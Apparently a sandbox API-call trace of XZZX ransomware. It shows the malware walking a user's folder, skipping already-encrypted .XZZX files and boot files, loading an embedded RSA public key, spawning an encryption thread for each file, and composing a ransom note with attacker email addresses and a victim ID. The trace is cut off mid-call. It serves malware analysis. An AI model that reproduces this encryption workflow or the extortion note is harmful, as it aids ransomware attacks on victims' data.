param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0245.738] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0245.738] lstrcpyW (in: lpString1=0x179d3c, lpString2="04BBA0D020119813F8F6E49024327C5B.XZZX" | out: lpString1="04BBA0D020119813F8F6E49024327C5B.XZZX") returned="04BBA0D020119813F8F6E49024327C5B.XZZX" [0245.738] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0245.738] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1320 [0245.739] Sleep (dwMilliseconds=0x96) [0245.892] FindNextFileW (in: hFindFile=0x3cded18, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0245.892] lstrcmpW (lpString1="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpString2="..") returned 1 [0245.892] lstrcmpW (lpString1="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpString2=".") returned 1 [0245.893] StrStrW (lpFirst="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0245.893] StrStrW (lpFirst="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpSrch="ntldr") returned 0x0 [0245.893] StrStrW (lpFirst="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpSrch="NTLDR") returned 0x0 [0245.893] StrStrW (lpFirst="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0245.893] StrStrW (lpFirst="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpSrch="ntdetect.com") returned 0x0 [0245.893] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="Desktop") returned 0x0 [0245.893] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="DESKTOP") returned 0x0 [0245.893] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0245.893] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0245.893] lstrcpyW (in: lpString1=0x179d3c, lpString2="3006C810075ED0F01F3DE7C50B7FB538.XZZX" | out: lpString1="3006C810075ED0F01F3DE7C50B7FB538.XZZX") returned="3006C810075ED0F01F3DE7C50B7FB538.XZZX" [0245.893] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0245.893] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1324 [0245.893] Sleep (dwMilliseconds=0x96) [0246.048] FindNextFileW (in: hFindFile=0x3cded18, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0246.048] lstrcmpW (lpString1="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpString2="..") returned 1 [0246.049] lstrcmpW (lpString1="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpString2=".") returned 1 [0246.049] StrStrW (lpFirst="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0246.049] StrStrW (lpFirst="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpSrch="ntldr") returned 0x0 [0246.049] StrStrW (lpFirst="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpSrch="NTLDR") returned 0x0 [0246.049] StrStrW (lpFirst="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0246.049] StrStrW (lpFirst="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpSrch="ntdetect.com") returned 0x0 [0246.049] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="Desktop") returned 0x0 [0246.049] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="DESKTOP") returned 0x0 [0246.049] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0246.049] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0246.049] lstrcpyW (in: lpString1=0x179d3c, lpString2="8F1540B007AB3EF89A8099C80BCC2340.XZZX" | out: lpString1="8F1540B007AB3EF89A8099C80BCC2340.XZZX") returned="8F1540B007AB3EF89A8099C80BCC2340.XZZX" [0246.049] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0246.049] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1328 [0246.049] Sleep (dwMilliseconds=0x96) [0246.204] FindNextFileW (in: hFindFile=0x3cded18, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0246.204] lstrcmpW (lpString1="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpString2="..") returned 1 [0246.205] lstrcmpW (lpString1="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpString2=".") returned 1 [0246.205] StrStrW (lpFirst="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0246.205] StrStrW (lpFirst="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpSrch="ntldr") returned 0x0 [0246.205] StrStrW (lpFirst="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpSrch="NTLDR") returned 0x0 [0246.205] StrStrW (lpFirst="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0246.205] StrStrW (lpFirst="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpSrch="ntdetect.com") returned 0x0 [0246.205] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="Desktop") returned 0x0 [0246.205] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="DESKTOP") returned 0x0 [0246.205] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0246.205] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0246.205] lstrcpyW (in: lpString1=0x179d3c, lpString2="B02B14800A31A4C0C9DC8D360E528908.XZZX" | out: lpString1="B02B14800A31A4C0C9DC8D360E528908.XZZX") returned="B02B14800A31A4C0C9DC8D360E528908.XZZX" [0246.205] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0246.205] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x132c [0246.205] Sleep (dwMilliseconds=0x96) [0246.360] FindNextFileW (in: hFindFile=0x3cded18, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0246.360] lstrcmpW (lpString1="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpString2="..") returned 1 [0246.360] lstrcmpW (lpString1="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpString2=".") returned 1 [0246.360] StrStrW (lpFirst="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0246.360] StrStrW (lpFirst="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpSrch="ntldr") returned 0x0 [0246.361] StrStrW (lpFirst="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpSrch="NTLDR") returned 0x0 [0246.361] StrStrW (lpFirst="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0246.361] StrStrW (lpFirst="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0246.361] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="Desktop") returned 0x0 [0246.361] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="DESKTOP") returned 0x0 [0246.361] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0246.361] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0246.361] lstrcpyW (in: lpString1=0x179d3c, lpString2="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX" | out: lpString1="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX") returned="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX" [0246.361] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0246.361] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1330 [0246.361] Sleep (dwMilliseconds=0x96) [0246.517] FindNextFileW (in: hFindFile=0x3cded18, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0246.517] lstrcmpW (lpString1="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpString2="..") returned 1 [0246.517] lstrcmpW (lpString1="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpString2=".") returned 1 [0246.517] StrStrW (lpFirst="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0246.517] StrStrW (lpFirst="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpSrch="ntldr") returned 0x0 [0246.517] StrStrW (lpFirst="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpSrch="NTLDR") returned 0x0 [0246.517] StrStrW (lpFirst="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0246.517] StrStrW (lpFirst="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0246.517] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="Desktop") returned 0x0 [0246.517] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="DESKTOP") returned 0x0 [0246.517] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0246.517] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0246.517] lstrcpyW (in: lpString1=0x179d3c, lpString2="FA78694804C1E3566FC4CB7C08F6C79E.XZZX" | out: lpString1="FA78694804C1E3566FC4CB7C08F6C79E.XZZX") returned="FA78694804C1E3566FC4CB7C08F6C79E.XZZX" [0246.517] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0246.517] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1334 [0246.518] Sleep (dwMilliseconds=0x96) [0246.672] FindNextFileW (in: hFindFile=0x3cded18, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0246.672] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0246.672] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0246.673] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0246.673] FindNextFileW (in: hFindFile=0x3cded18, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0 [0246.673] FindClose (in: hFindFile=0x3cded18 | out: hFindFile=0x3cded18) returned 1 [0246.673] FindClose (in: hFindFile=0x3cded18 | out: hFindFile=0x3cded18) returned 0 [0246.673] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" [0246.673] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*" [0246.673] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="Desktop") returned 0x0 [0246.673] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="DESKTOP") returned 0x0 [0246.673] SetErrorMode (uMode=0x1) returned 0x1 [0246.673] wsprintfW (in: param_1=0x1792fc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\_HELP_INSTRUCTION.TXT") returned 96 [0246.673] GetUserNameW (in: lpBuffer=0x1770d8, pcbBuffer=0x176ec4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x176ec4) returned 1 [0246.673] wsprintfW (in: param_1=0x176ed0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0246.674] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x176ecc | out: phkResult=0x176ecc*=0x1338) returned 0x0 [0246.674] RegQueryValueExW (in: hKey=0x1338, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dd0d0, lpcbData=0x176ec8*=0x104 | out: lpType=0x0, lpData=0x43dd0d0*=0x65, lpcbData=0x176ec8*=0x4a) returned 0x0 [0246.674] RegCloseKey (hKey=0x1338) returned 0x0 [0246.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x1782fc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0246.674] wsprintfW (in: param_1=0x1772fc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0246.674] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 